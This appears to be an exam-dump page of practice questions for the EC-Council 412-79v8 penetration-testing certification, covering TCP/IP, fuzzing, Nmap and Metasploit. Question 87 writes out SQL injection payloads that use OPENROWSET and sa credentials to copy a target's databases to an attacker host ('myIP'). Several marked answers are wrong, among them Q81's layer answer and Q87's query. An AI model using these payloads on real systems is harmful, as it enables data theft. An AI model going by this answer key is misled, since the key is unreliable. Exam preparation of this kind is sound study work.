EC-COUNCIL 412-79V8 Online Practice Questions and Exam Preparation

EC-COUNCIL 412-79V8 Online Questions & Answers

• Question 81:

  TCP/IP model is a framework for the Internet Protocol suite of computer network protocols that defines the communication in an IP-based network. It provides end-to-end connectivity specifying how data should be formatted, addressed, transmitted, routed and received at the destination. This functionality has been organized into four abstraction layers which are used to sort all related protocols according to the scope of networking involved.

  

  Which of the following TCP/IP layers selects the best path through the network for packets to travel?

  A. Transport layer
  B. Network Access layer
  C. Internet layer
  D. Application layer
  B. Network Access layer

• Question 82:

  Fuzz testing or fuzzing is a software/application testing technique used to discover coding errors and security loopholes in software, operating systems, or networks by inputting massive amounts of random data, called fuzz, to the system in

  an attempt to make it crash.

  Fuzzers work best for problems that can cause a program to crash, such as buffer overflow, cross-site scripting, denial of service attacks, format bugs, and SQL injection. Fuzzer helps to generate and submit a large number of inputs supplied

  to the application for testing it against the inputs. This will help us to identify the SQL inputs that generate malicious output.

  Suppose a pen tester knows the underlying structure of the database used by the application (i.e., name, number of columns, etc.) that she is testing.

  Which of the following fuzz testing she will perform where she can supply specific data to the application to discover vulnerabilities?

  A. Clever Fuzz Testing
  B. Dumb Fuzz Testing
  C. Complete Fuzz Testing
  D. Smart Fuzz Testing
  C. Complete Fuzz Testing

• Question 83:

  Which one of the following is a useful formatting token that takes an int * as an argument, and writes the number of bytes already written, to that location?

  A. "%n"
  B. "%s"
  C. "%p"
  D. "%w"
  A. "%n"

• Question 84:

  What threat categories should you use to prioritize vulnerabilities detected in the pen testing report?

  A. 1, 2, 3, 4, 5
  B. Low, medium, high, serious, critical
  C. Urgent, dispute, action, zero, low
  D. A, b, c, d, e
  B. Low, medium, high, serious, critical

• Question 85:

  Identify the framework that comprises of five levels to guide agency assessment of their security programs and assist in prioritizing efforts for improvement:

  A. Information System Security Assessment Framework (ISSAF)
  B. Microsoft Internet Security Framework
  C. Nortells Unified Security Framework
  D. Federal Information Technology Security Assessment Framework
  D. Federal Information Technology Security Assessment Framework

• Question 86:

  Nessus can test a server or a network for DoS vulnerabilities. Which one of the following script tries to kill a service?

  A. ACT_DENIAL
  B. ACT_FLOOD
  C. ACT_KILL_HOST
  D. ACT_ATTACK
  A. ACT_DENIAL

• Question 87:

  A penetration tester tries to transfer the database from the target machine to a different machine. For this, he uses OPENROWSET to link the target database to his own database, replicates the database structure, and transfers the data to

  his machine by via a connection to the remote machine on port 80.

  The query he used to transfer databases was:

  '; insert into OPENROWSET

  ('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases The query he used to transfer table 1 was:

  '; insert into OPENROWSET('SQLoledb',

  'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1') select * from database..table1

  What query does he need in order to transfer the column?

  A. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables
  B. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows
  C. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns
  D. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_tables.dbo.syscolumns
  D. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_tables.dbo.syscolumns

• Question 88:

  Which of the following is not a characteristic of a firewall?

  A. Manages public access to private networked resources
  B. Routes packets between the networks
  C. Examines all traffic routed between the two networks to see if it meets certain criteria
  D. Filters only inbound traffic but not outbound traffic
  B. Routes packets between the networks

• Question 89:

  John, the penetration tester in a pen test firm, was asked to find whether NTP services are opened on the target network (10.0.0.7) using Nmap tool.

  

  Which one of the following Nmap commands will he use to find it?

  A. nmap -sU p 389 10.0.0.7
  B. nmap -sU p 123 10.0.0.7
  C. nmap -sU p 161 10.0.0.7
  D. nmap -sU p 135 10.0.0.7
  B. nmap -sU p 123 10.0.0.7

• Question 90:

  Metasploit framework in an open source platform for vulnerability research, development, and penetration testing. Which one of the following metasploit options is used to exploit multiple systems at once?

  A. NinjaDontKill
  B. NinjaHost
  C. RandomNops
  D. EnablePython
  A. NinjaDontKill